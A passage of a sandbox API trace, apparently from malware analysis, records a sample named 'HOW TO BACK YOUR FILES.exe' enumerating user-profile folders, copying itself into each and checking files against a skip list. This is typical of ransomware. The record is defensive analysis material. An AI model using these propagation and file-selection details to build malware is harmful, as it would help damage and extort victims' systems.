BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.342] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\microsoft\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.342] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.342] GetLastError () returned 0x0 [0042.342] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.342] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.342] CloseHandle (hObject=0x118) returned 1 [0042.342] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f8fb0 | out: hHeap=0x2b0000) returned 1 [0042.342] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.342] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4a6392c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a6392c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.343] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.343] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0042.343] lstrcpyW (in: lpString1=0x2e2e8e0, lpString2="Credentials" | out: lpString1="Credentials") returned="Credentials" [0042.343] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2380 [0042.343] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x98) returned 0x2cb310 [0042.343] RtlInterlockedPushEntrySList (in: ListHead=0x2e77d0, ListEntry=0x2d2388 | out: ListHead=0x2e77d0, ListEntry=0x2d2388) returned 0x2d2368 [0042.343] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4ac52b20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ac52b20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Feeds", cAlternateFileName="")) returned 1 [0042.343] lstrcmpiW (lpString1="Feeds", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.343] lstrcmpiW (lpString1="Feeds", lpString2="aoldtz.exe") returned 1 [0042.343] lstrcpyW (in: lpString1=0x2e2e8e0, lpString2="Feeds" | out: lpString1="Feeds") returned="Feeds" [0042.343] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d23a0 [0042.343] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x8c) returned 0x2cb3b0 [0042.343] RtlInterlockedPushEntrySList (in: ListHead=0x2e77d0, ListEntry=0x2d23a8 | out: ListHead=0x2e77d0, ListEntry=0x2d23a8) returned 0x2d2388 [0042.343] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4abba5a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4abba5a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Feeds Cache", cAlternateFileName="FEEDSC~1")) returned 1 [0042.343] lstrcmpiW (lpString1="Feeds Cache", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.343] lstrcmpiW (lpString1="Feeds Cache", lpString2="aoldtz.exe") returned 1 [0042.343] lstrcpyW (in: lpString1=0x2e2e8e0, lpString2="Feeds Cache" | out: lpString1="Feeds Cache") returned="Feeds Cache" [0042.343] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d23c0 [0042.343] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x98) returned 0x2cba28 [0042.343] RtlInterlockedPushEntrySList (in: ListHead=0x2e77d0, ListEntry=0x2d23c8 | out: ListHead=0x2e77d0, ListEntry=0x2d23c8) returned 0x2d23a8 [0042.343] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4a6392c0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4a6392c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0042.343] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0042.343] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4ab6e2e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ab6e2e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Internet Explorer", cAlternateFileName="INTERN~1")) returned 1 [0042.343] lstrcmpiW (lpString1="Internet Explorer", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0042.343] lstrcmpiW (lpString1="Internet Explorer", lpString2="aoldtz.exe") returned 1 [0042.343] lstrcpyW (in: lpString1=0x2e2e8e0, lpString2="Internet Explorer" | out: lpString1="Internet Explorer") returned="Internet Explorer" [0042.343] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d23e0 [0042.343] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xa4) returned 0x2cbac8 [0042.343] RtlInterlockedPushEntrySList (in: ListHead=0x2e77d0, ListEntry=0x2d23e8 | out: ListHead=0x2e77d0, ListEntry=0x2d23e8) returned 0x2d23c8 [0042.343] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4aa17680, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4aa17680, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Media Player", cAlternateFileName="MEDIAP~1")) returned 1 [0042.344] lstrcmpiW (lpString1="Media Player", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0042.344] lstrcmpiW (lpString1="Media Player", lpString2="aoldtz.exe") returned 1 [0042.344] lstrcpyW (in: lpString1=0x2e2e8e0, lpString2="Media Player" | out: lpString1="Media Player") returned="Media Player" [0042.344] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2400 [0042.344] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x9a) returned 0x2cbb78 [0042.344] RtlInterlockedPushEntrySList (in: ListHead=0x2e77d0, ListEntry=0x2d2408 | out: ListHead=0x2e77d0, ListEntry=0x2d2408) returned 0x2d23e8 [0042.344] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x66d8860, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x4d1d5e4e, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 1 [0042.344] lstrcmpiW (lpString1="Windows", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0042.344] lstrcmpiW (lpString1="Windows", lpString2="aoldtz.exe") returned 1 [0042.344] lstrcpyW (in: lpString1=0x2e2e8e0, lpString2="Windows Mail" | out: lpString1="Windows Mail") returned="Windows Mail" [0042.344] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2420 [0042.344] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x9a) returned 0x2cbdb0 [0042.344] RtlInterlockedPushEntrySList (in: ListHead=0x2e77d0, ListEntry=0x2d2428 | out: ListHead=0x2e77d0, ListEntry=0x2d2428) returned 0x2d2408 [0042.344] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a71db00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a71db00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Media", cAlternateFileName="WINDOW~2")) returned 1 [0042.344] lstrcmpiW (lpString1="Windows Media", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0042.344] lstrcmpiW (lpString1="Windows Media", lpString2="aoldtz.exe") returned 1 [0042.344] lstrcpyW (in: lpString1=0x2e2e8e0, lpString2="Windows Media" | out: lpString1="Windows Media") returned="Windows Media" [0042.344] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2440 [0042.344] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x9c) returned 0x2cbe58 [0042.344] RtlInterlockedPushEntrySList (in: ListHead=0x2e77d0, ListEntry=0x2d2448 | out: ListHead=0x2e77d0, ListEntry=0x2d2448) returned 0x2d2428 [0042.344] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a71db00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a71db00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Sidebar", cAlternateFileName="WINDOW~1")) returned 1 [0042.344] lstrcmpiW (lpString1="Windows Sidebar", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0042.344] lstrcmpiW (lpString1="Windows Sidebar", lpString2="aoldtz.exe") returned 1 [0042.344] lstrcpyW (in: lpString1=0x2e2e8e0, lpString2="Windows Sidebar" | out: lpString1="Windows Sidebar") returned="Windows Sidebar" [0042.344] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2460 [0042.344] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xa0) returned 0x2cbf00 [0042.344] RtlInterlockedPushEntrySList (in: ListHead=0x2e77d0, ListEntry=0x2d2468 | out: ListHead=0x2e77d0, ListEntry=0x2d2468) returned 0x2d2448 [0042.344] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a71db00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a71db00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Sidebar", cAlternateFileName="WINDOW~1")) returned 0 [0042.344] FindClose (in: hFindFile=0x2ccea8 | out: hFindFile=0x2ccea8) returned 1 [0042.345] RtlInterlockedPopEntrySList (in: ListHead=0x2e77d0 | out: ListHead=0x2e77d0) returned 0x2d2468 [0042.345] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Sidebar", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Sidebar") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Sidebar" [0042.345] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cbf00 | out: hHeap=0x2b0000) returned 1 [0042.345] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2460 | out: hHeap=0x2b0000) returned 1 [0042.345] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Sidebar") returned 79 [0042.345] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Sidebar" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Sidebar") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Sidebar" [0042.345] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.345] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Sidebar\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\microsoft\\windows sidebar\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.345] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.345] GetLastError () returned 0x0 [0042.345] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.345] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.345] CloseHandle (hObject=0x118) returned 1 [0042.345] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f8fb0 | out: hHeap=0x2b0000) returned 1 [0042.346] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.346] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Sidebar\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a71db00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a71db00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.346] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.346] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0042.346] lstrcpyW (in: lpString1=0x2e2e900, lpString2="Gadgets" | out: lpString1="Gadgets") returned="Gadgets" [0042.346] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2460 [0042.346] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xb0) returned 0x2cbf00 [0042.346] RtlInterlockedPushEntrySList (in: ListHead=0x2e77d0, ListEntry=0x2d2468 | out: ListHead=0x2e77d0, ListEntry=0x2d2468) returned 0x2d2448 [0042.346] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4a71db00, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4a71db00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0042.346] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0042.346] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6451100, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6451100, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x184eadb, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x54, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Settings.ini", cAlternateFileName="")) returned 1 [0042.346] lstrcmpiW (lpString1="Settings.ini", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0042.346] lstrcmpiW (lpString1="Settings.ini", lpString2="aoldtz.exe") returned 1 [0042.346] lstrcpyW (in: lpString1=0x2e2e900, lpString2="Settings.ini" | out: lpString1="Settings.ini") returned="Settings.ini" [0042.346] lstrlenW (lpString="Settings.ini") returned 12 [0042.346] lstrlenW (lpString="Ares865") returned 7 [0042.346] lstrcmpiW (lpString1="ngs.ini", lpString2="Ares865") returned 1 [0042.346] lstrlenW (lpString=".dll") returned 4 [0042.346] lstrcmpiW (lpString1="Settings.ini", lpString2=".dll") returned 1 [0042.346] lstrlenW (lpString=".lnk") returned 4 [0042.346] lstrcmpiW (lpString1="Settings.ini", lpString2=".lnk") returned 1 [0042.346] lstrlenW (lpString=".ini") returned 4 [0042.346] lstrcmpiW (lpString1="Settings.ini", lpString2=".ini") returned 1 [0042.346] lstrlenW (lpString=".sys") returned 4 [0042.346] lstrcmpiW (lpString1="Settings.ini", lpString2=".sys") returned 1 [0042.346] lstrlenW (lpString="Settings.ini") returned 12 [0042.346] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Sidebar\\Gadgets", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Sidebar\\Gadgets") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Sidebar\\Gadgets" [0042.347] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cbf00 | out: hHeap=0x2b0000) returned 1 [0042.347] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2460 | out: hHeap=0x2b0000) returned 1 [0042.347] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Sidebar\\Gadgets") returned 87 [0042.347] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Sidebar\\Gadgets" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Sidebar\\Gadgets") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Sidebar\\Gadgets" [0042.347] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.347] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Sidebar\\Gadgets\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\microsoft\\windows sidebar\\gadgets\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.347] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.347] GetLastError () returned 0x0 [0042.347] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.347] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.347] CloseHandle (hObject=0x118) returned 1 [0042.347] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f8fb0 | out: hHeap=0x2b0000) returned 1 [0042.348] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.348] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Sidebar\\Gadgets\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a71db00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a71db00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.348] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.348] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0042.348] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Media", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Media") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Media" [0042.348] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cbe58 | out: hHeap=0x2b0000) returned 1 [0042.348] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2440 | out: hHeap=0x2b0000) returned 1 [0042.348] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Media") returned 77 [0042.348] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Media" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Media") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Media" [0042.348] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.348] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Media\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\microsoft\\windows media\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.348] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.349] GetLastError () returned 0x0 [0042.349] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.349] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.349] CloseHandle (hObject=0x118) returned 1 [0042.349] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f8fb0 | out: hHeap=0x2b0000) returned 1 [0042.349] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.349] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Media\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a71db00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a71db00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.349] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.349] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0042.349] lstrcpyW (in: lpString1=0x2e2e8fc, lpString2="12.0" | out: lpString1="12.0") returned="12.0" [0042.349] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2440 [0042.349] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xa6) returned 0x2cbe58 [0042.349] RtlInterlockedPushEntrySList (in: ListHead=0x2e77d0, ListEntry=0x2d2448 | out: ListHead=0x2e77d0, ListEntry=0x2d2448) returned 0x2d2428 [0042.349] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4a71db00, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4a71db00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", 